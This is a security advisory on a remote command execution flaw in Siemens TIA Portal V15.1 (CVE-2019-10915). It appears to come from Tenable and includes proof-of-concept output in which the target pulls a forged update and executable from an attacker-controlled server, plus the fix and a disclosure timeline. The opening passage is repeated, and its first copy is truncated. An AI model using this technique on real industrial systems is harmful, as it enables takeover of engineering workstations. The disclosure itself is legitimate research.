### Synopsis Tenable discovered a vulnerability in Siemens TIA Portal V15.1. The vulnerability is an unauthenticated, remote command execution vulnerability that allows a remote, unauthenticated attacker administrative access to all application commands. An attacker can execute application functionality by sending crafted packets over WebSockets protocol. The following output is from a proof of concept that triggers a malicious firmware update from an arbitrary server: ``` $python siemens_rce.py Starting httpd... 10.0.0.134 - - [08/Jul/2019 10:47:31] "GET /PWRSim/ HTTP/1.1" 200 - 10.0.0.134 - - [08/Jul/2019 10:47:33] "GET /PWRSim/PWRControlNet10 HTTP/1.1" 200 - 10.0.0.134 - - [08/Jul/2019 10:47:39] "GET /PWRSim/PWRControlNet10/SWM_RollOut_Configuration.xml HTTP/1.1" 200 - 10.0.0.134 - - [08/Jul/2019 10:47:43] "GET /PWRSim/PWRControlNet10/UpdatesSummaryCatalog.xml HTTP/1.1" 200 - [+] Writing xml update forwarder -> Inventory_TIAPORTAL_V15_UPD99.xml 10.0.0.134 - - [08/Jul/2019...
### Synopsis Tenable discovered a vulnerability in Siemens TIA Portal V15.1. The vulnerability is an unauthenticated, remote command execution vulnerability that allows a remote, unauthenticated attacker administrative access to all application commands. An attacker can execute application functionality by sending crafted packets over WebSockets protocol. The following output is from a proof of concept that triggers a malicious firmware update from an arbitrary server: ``` $python siemens_rce.py Starting httpd... 10.0.0.134 - - [08/Jul/2019 10:47:31] "GET /PWRSim/ HTTP/1.1" 200 - 10.0.0.134 - - [08/Jul/2019 10:47:33] "GET /PWRSim/PWRControlNet10 HTTP/1.1" 200 - 10.0.0.134 - - [08/Jul/2019 10:47:39] "GET /PWRSim/PWRControlNet10/SWM_RollOut_Configuration.xml HTTP/1.1" 200 - 10.0.0.134 - - [08/Jul/2019 10:47:43] "GET /PWRSim/PWRControlNet10/UpdatesSummaryCatalog.xml HTTP/1.1" 200 - [+] Writing xml update forwarder -> Inventory_TIAPORTAL_V15_UPD99.xml 10.0.0.134 - - [08/Jul/2019 10:47:47] "GET /PWRSim/simatic/tiaportal/SEBU-TIAPORTALUPDATE/15.1.0.4//Inventory_TIAPORTAL_V15_UPD99.xml HTTP/1.1" 200 - [+] Writing binary update forwarder -> Inventory_TIAPORTAL_V15_UPD99.exe 10.0.0.134 - - [08/Jul/2019 10:47:54] "HEAD /PWRSim/simatic/tiaportal/SEBU-TIAPORTALUPDATE/15.1.0.4/Inventory_TIAPORTAL_V15_UPD99.exe HTTP/1.1" 200 - 10.0.0.134 - - [08/Jul/2019 10:47:54] "HEAD /PWRSim/simatic/tiaportal/SEBU-TIAPORTALUPDATE/15.1.0.4/Inventory_TIAPORTAL_V15_UPD99.txt HTTP/1.1" 200 - 10.0.0.134 - - [08/Jul/2019 10:48:01] "GET /PWRSim/simatic/tiaportal/SEBU-TIAPORTALUPDATE/15.1.0.4/Inventory_TIAPORTAL_V15_UPD99.exe HTTP/1.1" 200 - [?] Checking BITS Range -> Got BITS range 0-4894 [+] Reading "calc.exe", sending segment [seeking->0, reading->4894] ``` ### Solution Upgrade to TIA Portal V15 Update 5 ### Disclosure Timeline * 04/01/2019 - Tenable discloses to Siemens. 90 day is July 1 * 04/02/2019 - Siemens acks Tenable, provides their disclosure policy, and asks for Tenable's public key. * 04/02/2019 - Tenable provides their public key. * 04/05/2019 - Siemens acknowledges vulnerability, is working on a fix * 04/08/2019 - Tenable requests CVE from Siemens * 04/09/2019 - Siemens says they will assign a CVE shortly before publication * 05/02/2019 - Siemens assigns CVE-2019-10915 * 05/28/2019 - Siemens says they will publish an advisory on June 11th * 06/06/2019 - Siemens requests Tenable delay publishing until July 9 * 06/11/2019 - Tenable agrees to delay advisory until July 9
